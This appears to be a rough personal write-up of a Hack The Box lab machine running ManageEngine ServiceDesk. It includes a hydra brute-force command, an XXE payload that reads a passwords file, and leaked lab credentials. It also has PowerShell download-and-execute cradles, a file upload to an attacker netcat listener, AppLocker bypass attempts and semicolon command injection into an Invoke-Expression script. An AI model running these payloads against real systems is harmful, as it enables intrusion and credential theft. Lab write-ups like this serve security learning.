<pre><code> hydra 10.10.10.132 -s 8080 -L user.txt -P /home/htb/wordlist/seclist/Passwords/Common-Credentials/10-million-password-list-top-100.txt http-form-post &quot;/j_security_check:j_username=^USER^&amp;j_password=^PASS^&amp;LDAPEnable=false&amp;hidden=Select+a+Domain&amp;hidden=For+Domain&amp;AdEnable=false&amp;DomainCount=0&amp;LocalAuth=No&amp;LocalAuthWithDomain=No&amp;dynamicUserAddition_status=true&amp;localAuthEnable=true&amp;logonDomainName=-1&amp;loginButton=Login&amp;checkbox=checkbox:Username or Password is incorrect&quot;
</code></pre>

<p>XXE -   Stand for XML External Entity traversal</p>

<p>an xxe attack takes advantage of how an application parses xml input. since the webserver will return the output of the xml file. Xml  entity allows us to read files on the system/disk. The header creates a external entity thats using a system call and assigns it to the variable in the xml file. printing the contenets of any file on the system.</p>

<p>The first reference will help understand the different elements of xxe vuln. the second provice a proof of concept script that verifies this vuln works. It help understand what was needed and what was not. The last was the most helpful but getting it to work was tricky</p>

<pre><code>    ### references ###
</code></pre>

<ul>
<li><a href="https://www.acunetix.com/blog/articles/xml-external-entity-xxe-vulnerabilities/">https://www.acunetix.com/blog/articles/xml-external-entity-xxe-vulnerabilities/</a></li>
<li><a href="https://github.com/devcoinfet/Manage-Engine-9.3-xxe-/commit/624ca1cdcc126a5396e652aebedbf3a85256d058">https://github.com/devcoinfet/Manage-Engine-9.3-xxe-/commit/624ca1cdcc126a5396e652aebedbf3a85256d058</a></li>
<li><a href="https://labs.integrity.pt/advisories/cve-2017-9362/index.html">https://labs.integrity.pt/advisories/cve-2017-9362/index.html</a></li>
</ul>

<p>Below is the first valid response that wasn&rsquo;t a 3002 or 3026 xml errors. foo &amp; file are variables that can b arbitrarily replace, except file:///. also the order matters in the labs.integrity didn&rsquo;t add the xml version part. To get it to work on this system need to add the api version. then incert the variable in value.</p>

<p>i used cyber-chef to url-encode the strings. burp just does a whacky lame job of encoding in my opinion.  crt+u then crtl + u it will encode the + to %2b instead of %20</p>

<pre><code>OPERATION_NAME=add&amp;INPUT_DATA=&lt;?xml version=&quot;1.0&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ENTITY file SYSTEM &quot;file:///C:\Temp\Password Audit\it_logins.txt&quot;&gt;]&gt;
&lt;API version='1.0' locale='en'&gt;
&lt;value&gt;&amp;file;&lt;/value&gt;
&lt;/API&gt;
</code></pre>

<p>without the xml version it will give a xml error.</p>

<p><img src="xxe2.PNG" alt="xxe2" /></p>

<p><img src="xxe3.PNG" alt="xxe3" /></p>

<p>This produced the desired output. in the next section i played around with how much i need to get the same output.</p>

<pre><code>liOPERATION_NAME=add&amp;INPUT_DATA=&lt;?xml version=&quot;1.0&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ENTITY file SYSTEM &quot;file:///C:\Temp\Password Audit\it_logins.txt&quot;&gt;]&gt;
&lt;API version='1.0' locale='en'&gt;
&lt;records&gt;
        &lt;record&gt;
            &lt;parameter&gt;
                &lt;name&gt;CI Name&lt;/name&gt;
                &lt;value&gt;Tomcat Server 3&amp;file;&lt;/value&gt;
            &lt;/parameter&gt;
            &lt;parameter&gt;
                &lt;name&gt;CI Type&lt;/name&gt;
                &lt;value&gt;Business Service&lt;/value&gt;
            &lt;/parameter&gt;
            &lt;parameter&gt;
                &lt;name&gt;Site&lt;/name&gt;
                &lt;value&gt;(empty)&lt;/value&gt;
            &lt;/parameter&gt;
            &lt;parameter&gt;
                &lt;name&gt;Business Impact&lt;/name&gt;
                &lt;value&gt;High&lt;/value&gt;
            &lt;/parameter&gt;
            &lt;parameter&gt;
                &lt;name&gt;Description&lt;/name&gt;
                &lt;value&gt;Domain Conroller &lt;/value&gt;
            &lt;/parameter&gt;
            &lt;parameter&gt;
                &lt;name&gt;Availability Target(%)&lt;/name&gt;
                &lt;value&gt;200&lt;/value&gt;
            &lt;/parameter&gt;
            &lt;parameter&gt;
                &lt;name&gt;Service Support Hours&lt;/name&gt;
                &lt;value&gt;24X5&lt;/value&gt;
            &lt;/parameter&gt;
            &lt;parameter&gt;
                &lt;name&gt;Cost&lt;/name&gt;
                &lt;value&gt;8080&lt;/value&gt;
            &lt;/parameter&gt;
            &lt;parameter&gt;
                &lt;name&gt;Incident restoration target&lt;/name&gt;
                &lt;value&gt;90%&lt;/value&gt;
            &lt;/parameter&gt;
        &lt;/record&gt;
    &lt;/records&gt;
&lt;/API&gt;
</code></pre>

<p>So most of the stuff is just fluff and not necessary to get it run.</p>

<pre><code>OPERATION_NAME=add&amp;INPUT_DATA=&lt;?xml version=&quot;1.0&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ENTITY pie SYSTEM &quot;file:///C:\Temp\Password Audit\it_logins.txt&quot;&gt;]&gt;
&lt;API version='1.0' locale='en'&gt;
&lt;records&gt;
        &lt;record&gt;
            &lt;parameter&gt;
                &lt;name&gt;pinkie&lt;/name&gt;
                &lt;value&gt;&amp;pie;&lt;/value&gt;
            &lt;/parameter&gt;
        &lt;/record&gt;
    &lt;/records&gt;
&lt;/API&gt;
</code></pre>

<p><img src="xxe.PNG" alt="xxe" /></p>

<p>i can&rsquo;t really read this</p>

<pre><code>{&quot;API&quot;:{&quot;locale&quot;:&quot;en&quot;,&quot;version&quot;:&quot;1.0&quot;,&quot;response&quot;:{&quot;operation&quot;:{&quot;name&quot;:&quot;add&quot;,&quot;result&quot;:{&quot;statuscode&quot;:&quot;3016&quot;,&quot;status&quot;:&quot;Unable to perform the requested operation.&quot;,&quot;message&quot;:&quot;Unable to add the CI(s), please refer the error message.&quot;,&quot;created-date&quot;:&quot;Jun 8, 2019 01:27 AM&quot;},&quot;Details&quot;:{&quot;records&quot;:{&quot;failed&quot;:[&quot;1&quot;,{&quot;ci&quot;:{&quot;name&quot;:&quot;Tomcat Server 3\r\nlocal Windows account created\r\n\r\nusername: alice\r\npassword: $sys4ops@megabank!\r\nadmin required: no\r\n\r\nshadow admin accounts:\r\n\r\nmike_adm:Password1\r\ndr_acc:dr_acc&quot;,&quot;error&quot;:&quot;\'Product Name\' cannot be empty.&quot;}}],&quot;success&quot;:&quot;0&quot;,&quot;total&quot;:&quot;1&quot;}}}}}}
</code></pre>

<pre><code>admin required: no pass
user:	alice | pass:	 $sys4ops@megabank!
shadow admin acounts below
user:	mike_adm | pass:	Password1
dr_ass 	dr_ass
</code></pre>

<p>SHELL       ##### ALICE #####</p>

<p>We land and find our selves in constraint language mode. ran and checked the net framework version 2 isn&rsquo;t there so can&rsquo;t use that bypass. ran netstat to found that port 8081 is open locally. Obvisiously going to tunnel and gain access to localhost.</p>

<p>Enum CLM</p>

<pre><code>Get-ExecutionPolicy -List | Format-Table -AutoSize
</code></pre>

<pre><code>$ExecutionContext.SessionState.LanguageMode
</code></pre>

<pre><code>powershell -nop -c &quot;iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')&quot;
</code></pre>

<p>Enum .NET/powershell    =    figure out which bypass method should be used. this basically tells us what powershell version are available.</p>

<pre><code>reg query &quot;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP&quot;           
</code></pre>

<p><strong>Failure</strong>On top of everything else applocker is blocking msbuild.exe, group policy is also blocking other bypass methods. After digging around on google trying out various applocker bypasses. using <a href="https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe">csc.exe</a> c compile to bypass applocker.</p>

<p>Whitelist evation write by <a href="https://twitter.com/khr0x40sh">khr0x40sh</a> <a href="https://github.com/khr0x40sh/WhiteListEvasion">https://github.com/khr0x40sh/WhiteListEvasion</a> which will build our payload and generate a C# c sharp template. will produce .net binary that we will use to evade AppLocker. it uses msfvenom to generate the shell.</p>

<p>applocker shut down the above method C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe</p>

<p>Enum Netstat -ant</p>

<p><img src="netstat.PNG" alt="netstat" /></p>

<p>Enumerating powershell version because sometimes 32 or a older version of powershell is skipped so i run through and check whats available.</p>

<pre><code>[Environment]::Is64BitProcess
returns =	True
</code></pre>

<p><strong>USER</strong> TRIED USING ALICE PASSWORD ON ACCOUNTS BELOW</p>

<pre><code>LEO
TOLU
ZACHARY
ALICE
ADMINISTRATOR
</code></pre>

<p>####     FOUND SOME DRIVES!!    ####</p>

<p>I recently did ethereal and remember that 0xdf used a command to enumerate possible drives.</p>

<pre><code>fsutil fsinfo drives
</code></pre>

<p><img src="drives.PNG" alt="drives" /></p>

<p><strong>D:</strong>  Denied</p>

<p><strong>PSQL</strong></p>

<p><strong>E:</strong> The ManageEngine pgsql. Luckly I did flujab recently following ippsec and 0xdf guides.  I&rsquo;m slowly getting better at sql tables. ManageEngine uses pgsql(psql) to run the site, it took quite of bit of time to find the directory for pgsql i must have gleemed over it or it was changed.</p>

<p>Below is the path to psql.exe well use this to interact witht the sql server it is using default credentials. There are a bunch of other cool things in the pgsql\bin directory.</p>

<pre><code>cd E:\ManageEngine\ServiceDesk\pgsql\bin
</code></pre>

<p>From the root directory you there is another bin&rsquo;s folder that has changeDBServer.bat this file will give you the necessary information to login into the console. there is a cool exploit if i had the ability to write to these files. below is a example of editing one of the files during start up to elevate our session.</p>

<pre><code>ChangeJRE.bat
start &quot;&quot; &quot;C:\ManageEngine\ADManger Plus\bin\privesc.exe&quot;
</code></pre>

<p>Minatotw gave my a hint to mess with the pgsql. The below bit will dump all the tables. here well find a bunch of useful information. We could enumerate the whole website from here gaining all the information need about the target company. Services usernames passwords. im sure the credentials are reused. The below command generated two interesting tables aaauser aaapassword, i believe these naming conventions are quite common. i have used the triple a&rsquo;s before.</p>

<p>I reused the sql from flujab to enumerate the webapp.</p>

<pre><code>.\psql.exe -h 127.0.0.1 -U postgres -p 65432 -d servicedesk -c &quot;select 1,2,CONCAT(TABLE_SCHEMA,':',TABLE_NAME),4,5 from INFORMATION_SCHEMA.COLUMNS&quot;
-h host
-U username
-d name of the database
-c command line
</code></pre>

<pre><code>aaauser
aaapassword
</code></pre>

<p><img src="sql-password (2).PNG" alt="sql-password (2)" /></p>

<pre><code>.\psql.exe -h 127.0.0.1 -p 65432 -U postgres -d servicedesk -c &quot;select * from aaauser&quot;
.\psql.exe -h 127.0.0.1 -p 65432 -U postgres -d servicedesk -c &quot;select * from aaapassword&quot;
</code></pre>

<p><strong>AAAUSER</strong> it&rsquo;s nice to see howard stern still has gainful employment.</p>

<pre><code>System
$DEPT_HEAD$
Guest
administrator
Shawn Adams
Heather Graham
John robberts
Howard Stern
Jeniffer Doe
Alive Jones
Luis Ribeiro
Zachary Moore
Fiiona Drake
Mary Wong
Anne Sergeant
</code></pre>

<p><strong>AAAPASSWORD</strong></p>

<p><strong>LOCALGROUP</strong> policy</p>

<pre><code>net localgroup &quot;Remote Management Users&quot;
</code></pre>

<p><em>output</em></p>

<pre><code>alice
tolu
</code></pre>

<p>Trying to add alice into the administrators group</p>

<pre><code>net localgroup administrators alice /add		### DENIED
</code></pre>

<p>Enumerating user</p>

<pre><code>net localgroup Users
</code></pre>

<p><em>output</em></p>

<pre><code>Administrator
alice
leo
niels
NT AUTHORITY\Authenticated Users
NT AUTHORITY\INTERACTIVE
tolu
zachary
</code></pre>

<p>after playing around for awhile i stumbled apon net user. this will tell us information about a specific user instead of the groups. net l</p>

<pre><code>net user zachary
</code></pre>

<p><img src="zachary.PNG" alt="zachary" /></p>

<p>trying to find something related to event log readers policies. After some searching around on google i bumped into a command line utility for viewing event logs.</p>

<p><strong>WEVTUTIL.EXE</strong>    ####    is in the windows\system32 directory.</p>

<p>references :</p>

<ul>
<li><a href="https://docs.microsoft.com/en-us/windows/win32/wes/windows-event-log-tools">https://docs.microsoft.com/en-us/windows/win32/wes/windows-event-log-tools</a></li>
<li><a href="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil">https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil</a></li>
</ul>

<pre><code>c:\windows\system32\wevtutil.exe el /r:helpline /u:helpline\zachary /p:0987654321
el ENUMERATE EVENT LOG NAMES
/u USERNAME
/p PASSWORD
/r REMOTE COMPUTER NAME
</code></pre>

<p><strong>RESULTS</strong></p>

<pre><code>OpenSSH/Admin
muxencode
Security
Microsoft-Windows-RemoteApp and Desktop Connections/Admin
</code></pre>

<pre><code>c:\windows\system32\wevtutil.exe qe &quot;muxencode&quot; /r:helpline /u:helpline\zachary /p:0987654321 /f:text /rd:true
c:\windows\system32\wevtutil.exe qe &quot;security&quot; &quot;/q:*[Security [(Level=2)]]&quot; /r:helpline /u:helpline\zachary /p:0987654321 /f:text /rd:true 
</code></pre>

<p>Trying to view zachary powershell logs i get access denied</p>

<p><a href="https://jordanpotti.com/2017/01/20/basics-of-windows-incident-response/">https://jordanpotti.com/2017/01/20/basics-of-windows-incident-response/</a></p>

<p><a href="https://static1.squarespace.com/static/552092d5e4b0661088167e5c/t/578627e66b8f5b322df3ae5b/1468409832299/Windows+PowerShell+Logging+Cheat+Sheet+ver+June+2016+v2.pdf">https://static1.squarespace.com/static/552092d5e4b0661088167e5c/t/578627e66b8f5b322df3ae5b/1468409832299/Windows+PowerShell+Logging+Cheat+Sheet+ver+June+2016+v2.pdf</a></p>

<pre><code>c:\windows\system32\wevtutil.exe gl &quot;Microsoft-Windows-PowerShell/Operational&quot; /r:helpline /u:helpline\zachary /p:098765432
&quot;Windows PwerShell&quot;
</code></pre>

<table>
<thead>
<tr>
<th><strong>4720</strong></th>
<th>UserCreated</th>
</tr>
</thead>

<tbody>
<tr>
<td><strong>4725</strong></td>
<td>User Disabled</td>
</tr>

<tr>
<td><strong>4726</strong></td>
<td>User Deleted</td>
</tr>

<tr>
<td><strong>4722</strong></td>
<td>User Enabled</td>
</tr>
</tbody>
</table>

<p>User created</p>

<p><strong>4725</strong> User disabled</p>

<p><strong>4726</strong> User deleted</p>

<p><strong>4724</strong>  ##################  This even is created when the a password change is made and FAILS TO MEET PASSSOWRD POLICY.  there is another event 4723 passwordreset</p>

<pre><code>c:\windows\system32\wevtutil.exe qe Security /q:&quot;*[System[(EventID=4724)]]&quot; /c:5 /r:helpline /u:helpline\zachary /p:0987654321 /f:text /rd:true
</code></pre>

<p><strong>4688</strong> Documents each program that is executed, who the program ran as and the process that started this process. The Data for this event can be correlated with 4689. there could be something to this one. maybe transfering all the output to file.</p>

<pre><code>c:\windows\system32\wevtutil.exe qe Security /q:&quot;*[System[(EventID=4688)]]&quot; /c:20 /r:helpline /u:helpline\zachary /p:0987654321 /f:text /rd:true
</code></pre>

<p>OUTPUT* someone attemped to reset the admin password.</p>

<p><img src="event-id.PNG" alt="event-id" /></p>

<p><em>TASKLIST</em>  ### displays a list of currently running proccess <em>remote</em></p>

<pre><code>tasklist /S helpline  /U helpline/zachary /P 0987654321
/S server name 
/U domain\username
/P password
</code></pre>

<h2 id="tolu"><strong>TOLU</strong></h2>

<pre><code>!zaq1234567890pl!99
</code></pre>

<pre><code>Enable-WSManCredSSP -Role Client -DelegateComputer helpline.htb -force
Invoke-Command –ComputerName helpline.htb –ScriptBlock { Get-WindowsFeature | Where-Object {$_.InstallState –eq ‘Installed’} }
</code></pre>

<p>So finding the right event to get th credentials was pretty tough they were allot of recorded events. I saved everything to a file about 36 mega bytes of data.</p>

<pre><code>Enter-PSSession -ComputerName 10.10.10.132 -Credential tolu
</code></pre>

<p>FINDSTR or FINDSTRING is the windows equilivant of grep. i used this while queriering the security logs. to find that user tolu was running <a href="https://docs.microsoft.com/en-us/windows/win32/winsock/net-exe-2">net.exe</a></p>

<pre><code>c:\windows\system32\wevtutil.exe qe Security /r:helpline /u:helpline\zachary /p:0987654321 /f:text /rd:true | findstr tolu
</code></pre>

<pre><code>net.exe user T: \\helpline\helpdesk_stats /USER:tolu 
</code></pre>

<p><img src="tolu.PNG" alt="tolu" /></p>

<p>Going back to the <strong>E:</strong> drive tolu has access to some more directories. The script is written by leo</p>

<p>Starts off changing to the E:\ drive, use <em>Remove-Item</em> to clear output.txt, then checks ports, api, put all of this into output.txt. then it submit a <em>technician_key</em> (CDDBD0A5-5D71-48DE-8FF7-CB9751F0FE7C) and takes the output -Appends it to output.txt. I feel like this could be what i need im not exatly sure what the key is.</p>

<p>Checks service status using Get-Service servicedesk</p>

<p>This also seems like a point we could exploit.</p>

<pre><code># restore ServiceDesk data from secure backup folder if required                   
# put name of folder in backups.txt to retrieve it, e.g. backup_postgres_9309_fullbackup_mon 
</code></pre>

<p>the if statement checks the file path if true then it copies backups.txt from scripts to scripts\processing. then sanitize user input.</p>

<pre><code># script to check ServiceDesk Plus status, and restore backup from secure folder if needed                     
# please report any issues - leo     
</code></pre>

<p>It changes to the e drive cleans up previous attempts, checks the status of the ports, serviceengine is running.</p>

<pre><code>Remove-Item E:\Scripts\output.txt                                                                   
Get-Date | Add-Content E:\Scripts\output.txt  
</code></pre>

<p>I thought this part was interesting because im pretty sure that might be lou technician key</p>

<pre><code># check API

Add-Content E:\Scripts\output.txt &quot;&quot;
Add-Content E:\Scripts\output.txt &quot;Check API status&quot;

Invoke-RestMethod -Uri http://helpline:8080/sdpapi/request/1/ -Method Post -Body @{OPERATION_NAME='GET_REQUEST';TECHNICIAN_KEY='CDDBD0A5-5D71-48DE-8FF7-CB975$
F0FE7C';} | Out-File E:\Scripts\output.txt -Append -Encoding ASCII
</code></pre>

<p>Microsoft service doc about invoke-expression mentions sanitizing input in scripts that use this tool. This part checks that the file backups.txt is in scipts. then moves scripts/backups.txt to /script/process/backups.txt. Then it checks user input and remove any blacklisted characters.</p>

<p><a href="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-6">https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-6</a></p>

<pre><code># restore ServiceDesk data from secure backup folder if required
# put name of folder in backups.txt to retrieve it, e.g. backup_postgres_9309_fullbackup_mon                                                                 
if (Test-Path E:\Scripts\backups.txt) {
    Copy-Item E:\Scripts\backups.txt E:\Scripts\Processing\backups.txt
    # sanitize user input

    $file = Get-Content E:\Scripts\Processing\backups.txt
    $file -replace &quot;exe&quot;,&quot;&quot; &gt; E:\Scripts\Processing\backups.txt
    $file = Get-Content E:\Scripts\Processing\backups.txt
    $file -replace &quot;msi&quot;,&quot;&quot; &gt; E:\Scripts\Processing\backups.txt
    $file = Get-Content E:\Scripts\Processing\backups.txt
    $file -replace &quot;ps1&quot;,&quot;&quot; &gt; E:\Scripts\Processing\backups.txt
    $file = Get-Content E:\Scripts\Processing\backups.txt
    $file -replace &quot;cmd&quot;,&quot;&quot; &gt; E:\Scripts\Processing\backups.txt
    $file = Get-Content E:\Scripts\Processing\backups.txt
    $file -replace &quot;bat&quot;,&quot;&quot; &gt; E:\Scripts\Processing\backups.txt
    $file = Get-Content E:\Scripts\Processing\backups.txt
    $file -replace &quot;dll&quot;,&quot;&quot; &gt; E:\Scripts\Processing\backups.txt
    $file = Get-Content E:\Scripts\Processing\backups.txt
    $file -replace &quot; &quot;,&quot;&quot; &gt; E:\Scripts\Processing\backups.txt
    $file = Get-Content E:\Scripts\Processing\backups.txt
    $file -replace &quot;&amp;&quot;,&quot;&quot; &gt; E:\Scripts\Processing\backups.txt
    $file = Get-Content E:\Scripts\Processing\backups.txt
    $file -replace &quot;{&quot;,&quot;&quot; &gt; E:\Scripts\Processing\backups.txt
    $file = Get-Content E:\Scripts\Processing\backups.txt
    $file -replace &quot;}&quot;,&quot;&quot; &gt; E:\Scripts\Processing\backups.txt
    $file = Get-Content E:\Scripts\Processing\backups.txt
    $file -replace &quot;/&quot;,&quot;&quot; &gt; E:\Scripts\Processing\backups.txt
    $file = Get-Content E:\Scripts\Processing\backups.txt
    $file -replace &quot;\\&quot;,&quot;&quot; &gt; E:\Scripts\Processing\backups.txt
    $file = Get-Content E:\Scripts\Processing\backups.txt
    $file -replace &quot;&quot;&quot;&quot;,&quot;&quot; &gt; E:\Scripts\Processing\backups.txt
    $file = Get-Content E:\Scripts\Processing\backups.txt
    $file -replace &quot;\'&quot;,&quot;&quot; &gt; E:\Scripts\Processing\backups.txt
    $file = Get-Content E:\Scripts\Processing\backups.txt
    $file -replace &quot;\(&quot;,&quot;&quot; &gt; E:\Scripts\Processing\backups.txt
    $file = Get-Content E:\Scripts\Processing\backups.txt
    $file -replace &quot;\)&quot;,&quot;&quot; &gt; E:\Scripts\Processing\backups.txt
    $file = Get-Content E:\Scripts\Processing\backups.txt
    $file -replace &quot;\.&quot;,&quot;&quot; &gt; E:\Scripts\Processing\backups.txt
</code></pre>

<p><strong>BLACKLISTED</strong></p>

<p>vbs script in the above script sinlge quotes before the backslash is a scape or to signify its a REAL character.</p>

<pre><code>space
dll
exe
scripts:cmd,ps1,bat
&amp;
}
{
/
\
&quot;&quot;
\ &lt;&lt;=== the single quote is used as an escape. 
'
)
(
.
</code></pre>

<p>for each line in processing/backups.txt it puts the command as a variable uses invoke-expression to run the command. this is necessary to get it to work properly in a script. <strong>D</strong> should be a indicator the script ran. pipes it over to xcopy which is a tool used for coping files between systems.</p>

<pre><code>xcopy /E /R /C /Y /H /F /V E:\Backups\$backup E:\Restore\$backup
/c ignores errors
/f displays sources and destination file names while copying
/h copies files hidden files
/e Copies all subdirectories, even if they are empty. 
/r copies read only
/y Suppresses prompting to confirm that you want to overwrite an existing destination file
</code></pre>

<p>qmaybe I can base64 encode the string to bypass the blacklist.</p>

<pre><code>    ForEach ($backup in Get-Content &quot;E:\Scripts\Processing\backups.txt&quot;)
    {
      $Command = &quot;echo D | xcopy /E /R /C /Y /H /F /V E:\Backups\$backup E:\Restore\$backup&quot;                                                                 
      Invoke-Expression $Command
    }
</code></pre>

<pre><code>    Remove-Item E:\Scripts\backups.txt
    Remove-Item E:\Scripts\Processing\backups.txt
}
</code></pre>

<p><strong>applocker</strong></p>

<p>In additions to this trying to get information&rsquo;s out of applocker was kind of a pain. Get-AppLockerPolicy sent the output to a file then used certutil to encode the xml file. copy pasted over the data. The files are rather long every time i tried to use type i would get all kinds of errors. more and cat are the best options. <strong>MORE</strong> is a windows cmd tool to read large files.</p>

<pre><code>Get-AppLockerPolicy -Effective -XML &gt; meow.xml
certutil -encode meow.xml meow.b64
more
cat
type = bad crashes terminal
</code></pre>

<p>Okay apparently theres Invoke-webrequest POST .</p>

<p>this will put the file as the body of the message and send it over. we&rsquo;ll have to remove the header when it&rsquo;s sent over. setup a <em>NetCat</em> listener i like to use the verbose switch so i know if it connects etc. you will have to close the listener to close out everything, just check the bytes to know it&rsquo;s completely finished uploading.</p>

<pre><code>Invoke-WebRequest -Uri http://10.10.15.57 -Proxy 'http://10.10.15.57:80' -Method Post -InFile meow.xml
</code></pre>

<pre><code>nc -lvp 80 &gt; meow.xml
</code></pre>

<p><img src="invoke-post-applocker2.PNG" alt="invoke-post-applocker2" /></p>

<p><img src="invoke-post-applocker.PNG" alt="invoke-post-applocker" /></p>

<p>Applocker rule enforcement is applied to a collection of rules. there should be minium of four rule collections installers, executable, Dll, &amp; Scripts.</p>

<p><strong>IMPORTANT</strong>  each rule in the policy is an allow and applocker blocks them by default.</p>

<p>only the administrator as access to most of it, but in scripts there are a couple of rules  that are relevant  E:\scripts* there is a script in the leo directory hmmm. there are a bunch of rules in here like ManageEngine: run.bat</p>

<p><img src="invoke-post-applocker4.PNG" alt="invoke-post-applocker4" /></p>

<p>This is the big take away from the Applocker policy that any script is allowed to run in E:\scripts, maybe that run.ps1</p>

<p><img src="invoke-post-applocker3.PNG" alt="invoke-post-applocker3" /></p>

<p><strong>Invoke-Expression</strong></p>

<p>&ldquo;The <code>Invoke-Expression</code> cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command. Without <code>Invoke-Expression</code>, a string submitted at the command line would be returned (echoed) unchanged.&rdquo;</p>

<p>So, To test this out i made a smaller version of the script locally. then while i was playing with i see why what i was trying didn&rsquo;t work. i tried things like in linux &amp; | etc to escape out but this is a litte different.  <strong>;</strong> to get invoke-expression to escape out run a system command like hostname. ; isn&rsquo;t on the blacklist which might make this way harder.</p>

<pre><code>ForEach ($backup in Get-Content &quot;c:\Users\backups.txt&quot;)
{
$Command = &quot;echo D | xcopy /E /R /C /Y /H /F /V c:\Users\$backup c:\Users\process\$backup&quot;
Invoke-Expression $Command
}
</code></pre>

<pre><code>echo &quot;;hostname&quot; &gt; backups.txt
</code></pre>

<p><strong>PLAYING AROUND WITH DIFFERENT COMMAND &amp; MORE FILE TYPES</strong></p>

<p>I have never used any of theses other file types im going to use cmd because it is close to a bat file, it should be easier to find material to read up on. I don&rsquo;t know what i was reading about from this article but it works just like a bat file some of these guides are for administrators and shit they do all this bullshit crap</p>

<p><a href="https://smallbusiness.chron.com/write-cmd-script-53226.html">https://smallbusiness.chron.com/write-cmd-script-53226.html</a></p>

<p>Good new&rsquo;s everyone. i got a bunch of problems using robocopy or this other trick i found to copy multiple files. #lazy i ended up writing copy to notepad and pasting over. i dont have time for this copy poo for each test so i put commands ill use multiple times away.</p>

<pre><code>for %I in (pie.cmd backups.txt) do copy %I E:\scripts\
robocopy C:\Users\tolu\AppData\Local\Microsoft\WindowsApps\ E:\Scripts\ pie.cmd backups.txt
</code></pre>

<p>I made two version of the script locally the first simple just to make sure the program runs, the second with the filter. i just setup everything to run the cmd file it removed cmd. it is related to  bat file so i believe these might be smart filters. lol</p>

<p>Above i talk about the whats being black listed and i do believe the filters are smart for example ./ .\ or any commination is checked for.</p>

<p>So, after talking to some people &amp; reading about how malware is obfuscating powershell i believe.</p>

<pre><code>
</code></pre>

<pre><code>(New-Object Net.WebClient).downloadString('http://IP_ADDRESS/file-needed')
</code></pre>

<p>So, after playing with Invoke-obfuscation which is a really cool tool that i would love to use one day. 0xdf talks about it in the malware samples post. While this made things harder to detect and some of them got really close to bypassing the blacklisted characters the list proved to good.</p>

<p>So, next thing im going to try is Environmental variables. this is kind of tricky didn&rsquo;t quite work like i hoped it did. it&rsquo;s limited but useful. setting the enviroment variable is pretty straightforward. <code>set NameVariable Path</code></p>

<p>This whole things becoming a bleeping mess. Im currently trying to get the cor_profiler bypass to work, i tried the basics moving up to mingw custom dll. I tried using Beryllium dll but av picked it up. I also checked the firewall fules and using port 443 is fine as we know but still cool to check <code>netsh advfirewall firewall show rule name=all</code></p>

<p>So doing some futher testing when you enter powershell or tzsync it is indeed ran. i believe i am only setting my enviroment variables so it wont affect leo.</p>

<pre><code>``
email docs common
</code></pre>

<p>So there are some characters that cause a string to be treated differently like * does something special i watch daniel bohannon video about powershell encoding <a href="https://github.com/danielbohannon/Invoke-Obfuscation">obfuscation</a>.</p>

<p>Lets play with the script locally and try to gain a full understanding of what it is doing here. first off it takes input from a text file sanatize it then put&rsquo;s in a variable that invoke-expression calls. we get our command injection via the text file.</p>

<p>I found another file type .ps2 which is neat to know but period are taken away and also <code>|iex</code> will run a script</p>

<p>Let&rsquo;s go over all the interesting things about envirment variables and some of the ways they can be further used to run commands.</p>

<p>example one we have the backupscript, backups.txt. setx a env variable to point to a script saved as host.ps1 that makes a directory. The blacklisted characters prevent spaces but in a more limited version of the script this will run a command bypassing 90% of the list. i had orginally thought since this was in a powershell script that it wouldn&rsquo;t need powershell. maybe escaping has completely escaped out.</p>

<pre><code>setx mkd c:\users\user\host.ps1
echo &quot;powershell $env:mkd&quot;
</code></pre>

<p>next well run a command using `<code>t</code> special character for horizontal space. This will also make a directory named meow.</p>

<pre><code>powershell mkdir`tmeow
</code></pre>

<pre><code>setx meow &quot;c:\users\user\host.ps1&quot;
set meow=&quot;mkdir meow&quot;
</code></pre>

<p>we can use the ; and | to run commands yay. so i can store whatever i want as a enviroment variable and run it through powershell locally but this translating is different.</p>

<pre><code>;$env:meow|powershell
</code></pre>

<pre><code>winrm set winrm/config/server @{TrustedHosts=&quot;*&quot;}
</code></pre>

<pre><code>Enter-PsSession –ComputerName helpline.htb –Credentials helpline\administrator
</code></pre>

<p>You may also set enviroment variables with a command scripts or .cmd file. each line is a new command or something like that. ; are nice to add at the end but i dont believe they are necessary.</p>

<p>backups.txt</p>

<pre><code>;$env:death|powershell
</code></pre>

<p>set environment variable</p>

<pre><code>set death=&quot;e:\scripts\string.cmd&quot;
</code></pre>

<p>string.cmd u may use ;</p>

<pre><code>set test=1
set test2=&quot;{string}&quot;
set test3=&quot;e:\scripts\string.dll&quot;
tzsync
</code></pre>

<p>When you run .\host it and you have a file named host it will default complete to .ps1 and go down a list.</p>

<p>if you had the ability to write to any of the save env var you could also create a .ps1 file named after the directory and pipe to poewrshell bypass stuff that way.<a href="https://superuser.com/questions/916649/what-is-the-difference-between-setx-and-set-in-environment-variables-in-windows">https://superuser.com/questions/916649/what-is-the-difference-between-setx-and-set-in-environment-variables-in-windows</a></p>

<p>the difference between setx and set. &ldquo;<code>SETX</code> modifies the value permanently, which affects all future shells. it does not modify the enviroment of the shells already running. &ldquo;</p>

<p>&ldquo;set modifies modifies the current shells (windows) env values. the change is available immediatly. &ldquo;&rdquo;</p>

<p>with these things in mind maybe im not affecting leo. by changing my own enviroment vars because he is running the script so it doens&rsquo;t pull from my enviroment vars. super lame</p>

<p>i can&rsquo;t change change the enviroment variables to effect the outcome. i can only use them to get shell. I can use prexisting env values to run a script. because if i pipe a file to powershell it will append .ps1.</p>

<p>leo is a helpdesk admin and has full access to helpdesk engine and its install im pretty sure theres cve for that.</p>

<p><a href="https://stackoverflow.com/questions/50018274/why-does-invoke-operator-and-invoke-expression-produce-different-results-for">https://stackoverflow.com/questions/50018274/why-does-invoke-operator-and-invoke-expression-produce-different-results-for</a></p>

<p>semicolon is the statement separator for powershell.</p>

<p>what the parser see&rsquo;s ; it considers that the end of the first command and starts to parse the second command.</p>

